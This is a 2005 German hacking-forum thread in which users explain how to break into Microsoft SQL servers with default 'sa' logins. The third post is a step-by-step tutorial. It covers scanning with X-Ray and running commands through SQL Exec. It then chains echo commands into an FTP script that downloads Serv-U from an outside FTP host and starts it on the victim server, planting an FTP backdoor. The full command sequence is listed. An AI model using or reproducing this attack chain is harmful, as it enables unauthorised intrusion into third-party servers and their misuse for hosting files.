Welches Programm um Mssql zu hacken

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von P0w3r0fCh4o5, 13. Februar 2005 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 13. Februar 2005
    HuHu

    Habe mich erst neulich mal auf den Weg gemacht um nach Mssql zu scannen! Da ich es das erste mal mache benutze ich X-ray und dann habe ich Mssql und dahinter sa angegeben!
    Ip range ist gut und steht nicht in Blacklist!
    Das Problem ist jetzt nur das wenn ich mich mit FlashFXP auf den server einloggen will immer eine Fehler meldung kommt die dann so aussieht:

    [R] Connecting to 218.1.116.145 -> IP=218.1.116.145 PORT=21
    [R] Connected to 218.1.116.145
    [R] 220 Microsoft FTP Service
    [R] USER sa
    [R] 331 Password required for sa.
    [R] PASS (hidden)
    [R] 530 User sa cannot log in.
    [R] Connection failed

    So habe mich dann nun schonmal ein wenig berkundigt ( auc in nderen boards) und die haben mir gesagt das das mit flash FXP gar nicht geht# deshalb bin ich nun auf der Suche nach diesem Programm um mich dann mit den daten einzuloggen!!!

    Vielen dank schonmal im Vorraus!!!

    mfg.
     

  2. Anzeige
  3. #2 13. Februar 2005
    ehm...du kannst nich gleich auf den gescannten server connecten, du musst erstmal mit sqlexec servu raufladen>servu starten, und dann hast du n ftp server
     
  4. #3 13. Februar 2005
    RE: Für diesen Beitrag bedanken sich folgende User:

    Hier ein tut für sql hacken

    Also als erstes braucht man einen SQL Server mit Logindaten, wenn du keine Scanner Leuts hast die das für dich machen, dann scan einfach selber am besten mit X-Ray.

    1. Du brauchst ein progy dafür das heisst SQL Exec, such einfach mal bei google oder sonst wo....
    2. Also du startest es, wenn da so ein registrier bogen kommt einfach auf Later drücken.
    3. Wenn du das jetzt vor dir hast, gibst du oben die IP von dem SQL server an und da neben das login und drückst auf "Connect".
    4. Wenn der verbunden hat (klapt nicht immer) kannst du unten die Befehle eingeben. Geb einfach mal "dir C:\" ein und drück auf "Exec", dann kannst du auch sehen wie viel platz frei ist.
    5. Wenn da dann ne ausgabe kommt tuts der wahrscheinlich. Du musst iregnswo auf nen FTP das ftp prog uppen denn der soll sich das da nachher runterladen. Da wir keine Befehle hintereinander angeben können, sondern nur immer einzelne, erstellen wir eine TXT datei, wo wir die einzelen befehle die dass FTP prog zum download der FTP server dateien braucht reinspeichern.
    6. 1. Wir schreiben als erstes die ip in die TXT Datei "echo.open [ip vom FTP wo das Progy draufliegt]>>[Pfad wo die TXT datei hin soll][name der TXT Datei].txt" also zb "echo.open 216.45.64.453>>c:\SQLftp.txt" und auf "Exec.
    2. Jetzt geben wir dem die Login Daten des FTPS "echo.user [username] [pw]>>[Pfad wo die TXT datei hin soll][name der TXT Datei].txt" also zb "echo.user anonymous john@anon.com>>c:\SQLftp.txt"
    3. Das is damit der Binarymodus benutzt: echo.binary>>[Pfad wo die TXT datei hin soll][name der TXT Datei].txt" also zb "echo.binary>>c:\SQLftp.txt"
    4. Nun sagen wir dem die Dateien die der alle kopieren soll, als erstes mal für die exe: "echo.get [pfad wo die datei auf dem FTP liegt][name der FTP Prog Datei].exe [pfad wo die datei auf dem SQL hin sollen][name der FTP Prog Datei].exe>>[Pfad wo die TXT datei hin soll][name der TXT Datei].txt" also zb "echo.get /Serv-U32.exe c:\Serv-U32.exe>>c:\SQLftp.txt" und jetzt für die ini: "echo.get [pfad wo die datei auf dem FTP liegt][name der ini Datei].ini [pfad wo die datei auf dem SQL hin sollen][name der ini Datei].ini>>[Pfad wo die TXT datei hin soll][name der TXT Datei].ini" also zb "echo.get /Serv-U.ini c:\Serv-U.ini>>c:\SQLftp.txt"
    5. Jetzt sagen wir dem noch das der die Verbindung wieder trennen soll: "echo.quit>>[Pfad wo die TXT datei hin soll][name der TXT Datei].txt" also zb "echo.quit>>c:\SQLftp.txt"
    7. Nun sagen wir dem server das der alles nacheinander machen soll wie wir das in die TXT geschrieben haben "ftp -n -v -s:[Pfad wo die TXT datei ist][name der TXT Datei].txt" also zb "ftp -n -v -s:c:\SQLftp.txt"
    8. Jetzt kucken ob die Dateien da sind und starten mit "start [pfad zur Datei][name der Datei].exe" also zb "ftp -n -v -s:c:\SQLftp.txt"
    9. Zum abschluss nur noch drauf verbinden und kucken obs geht. Fertig!

    Jetzt noch mal alle Befehle hintereinander:

    echo.open 12.230.187.151>>c:\SQLftp.txt

    echo.user anonymous john@anon.com>>c:\SQLftp.txt

    echo.binary>>c:\SQLftp.txt

    echo.get /Serv-U32.exe c:\Serv-U32.exe>>c:\SQLftp.txt

    echo.get /serv-u.ini c:\serv-u.ini>>c:\SQLftp.txt

    echo.quit>>c:\SQLftp.txt

    ftp -n -v -s:c:\SQLftp.txt
     
  5. #4 4. März 2005
    Öhm kann mir das evventuell nochmal jemand auf Deutsch erklären damit ich das auch verstehe!!!

    Bin etwas schwer von Begriff müsst ihr wissen aber wenn mir jemand ein richtig schönes tutorial dazu schreiben könnte was ich auch verstehe dann bitte meldet euch bei mir!!!

    mfg.
     
  6. #5 4. März 2005
    Hi

    Hättes ja mal in der Tutorial Section HIER schauen können bevor Du hier anfragst :rolleyes:


    cu Blade
     

  7. Videos zum Thema
Die Seite wird geladen...
Similar Threads - Welches Programm Mssql
  1. Antworten:
    10
    Aufrufe:
    1.225
  2. Antworten:
    1
    Aufrufe:
    403
  3. Antworten:
    8
    Aufrufe:
    1.627
  4. Welches Pack-Programm benutzt ihr?

    wave , 15. Februar 2012 , im Forum: Macintosh
    Antworten:
    23
    Aufrufe:
    2.426
  5. Antworten:
    1
    Aufrufe:
    984